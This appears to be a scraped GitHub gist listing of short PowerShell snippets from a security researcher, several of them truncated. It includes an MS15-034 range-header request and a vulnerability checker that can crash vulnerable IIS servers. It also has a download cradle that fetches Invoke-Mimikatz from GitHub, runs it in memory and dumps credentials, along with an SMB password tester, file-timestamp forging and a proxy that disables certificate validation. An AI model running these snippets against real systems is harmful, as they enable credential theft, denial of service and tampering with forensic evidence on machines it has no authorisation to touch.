Skip to content

Instantly share code, notes, and snippets.

View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
@obscuresec
obscuresec / base64padding.ps1
Created Apr 15, 2015
Base64 Padding in PowerShell
View base64padding.ps1
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
View gist:eb46bc1094cd6003a12d
function Test-MS15034($url) {
try {
$wr = [Net.WebRequest]::Create($url)
$wr.AddRange('bytes',18,18446744073709551615)
$res = $wr.GetResponse()
$status = $res.statuscode
Write-Output "$status means it is not vulnerable"
$res.Close()
}catch {
if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"}
View test-ms15034.ps1
function Test-MS15034($url) {
try {
$wr = [Net.WebRequest]::Create($url)
$wr.AddRange('bytes',234234,28768768)
$res = $wr.GetResponse()
$status = $res.statuscode
Write-Output "$status means it is not vulnerable"
$res.Close()
}catch {
if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"}
View gist:104edc53459715214226
Function Get-SubnetResolution {
$Subnet = '74.125.228' #change this
$Wait = 2 #Seconds to wait between resolution
$HostRangeLow = 1
$HostRangeHigh = 10
$Range = $HostRangeLow..$HostRangeHigh
#Instantiate once
$DnsObject = [Net.DNS]
View gist:df5f652c7e7088e2412c
function Test-SmbPassword {
<#
.SYNOPSIS
Tests a username and password to see if it is valid against a remote machine or domain.
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
View gist:f24832d8b02288ab6532
$wc=new-object net.webclient
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $im
invoke-mimikatz -DumpCreds
View gist:25e8a142eb08bf237799
function Set-MacAttribute {
<#
.SYNOPSIS
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input.
PowerSploit Function: Set-MacAttribute
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
View gist:7b0cf71d7a8dd5e7b54c
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@obscuresec
obscuresec / psproxy.ps1
Created May 19, 2014
Simple but dirty Powershell web proxy
View psproxy.ps1
#simple and dirty proxy
#usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com
$Up = "http://+:8000/"
$Hso = New-Object Net.HttpListener
$Wco = New-Object Net.Webclient
#ignore self-signed/invalid ssl certs
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)}
You can’t perform that action at this time.